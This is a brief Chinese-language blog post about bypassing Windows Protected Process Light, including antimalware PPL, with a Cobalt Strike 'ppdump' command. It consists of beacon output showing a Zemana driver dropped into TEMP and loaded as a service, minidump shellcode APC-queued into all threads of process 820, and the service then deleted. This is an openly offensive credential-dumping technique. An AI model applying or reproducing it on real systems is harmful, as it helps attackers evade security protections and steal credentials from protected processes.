MENU

PPDump过Protected Process Light

March 27, 2020 • 安全阅读设置

过Antimalware Protected Process Light

    beacon> ppdump 820
    [ ] driver will be stored in C:\WINDOWS\TEMP\tiGr4.sys
    [ ] minidump will be stored in C:\WINDOWS\TEMP\usaxb.dmp
    [+] Wrote 232792 to C:\WINDOWS\TEMP\tiGr4.sys successfully
    [ ] attemping to load C:\WINDOWS\TEMP\tiGr4.sys with service control manager
    [ ] registered service tiGr4.sys successfully
    [ ] started service tiGr4.sys successfully
    [+] LoadDriver() successfully loaded the driver
    [ ] Calling ZemanaRegisterProcess() to add 3616
    [ ] Opening target process -> 820
    
     ======= ENTER THE DANGER ZONE =======
    [ ] MiniDumpWriteDump Shellcode is 1025 bytes
    [ ] Attemping to APC Bomb All Threads
    [+] apc successfully queued for 836
    [+] apc successfully queued for 848
    [+] apc successfully queued for 852
    [+] apc successfully queued for 864
    [+] apc successfully queued for 3456
    [+] apc successfully queued for 4044
    [+] apc successfully queued for 344
     ======= LEAVE THE DANGER ZONE =======
    
    [ ] deleted service tiGr4.sys successfully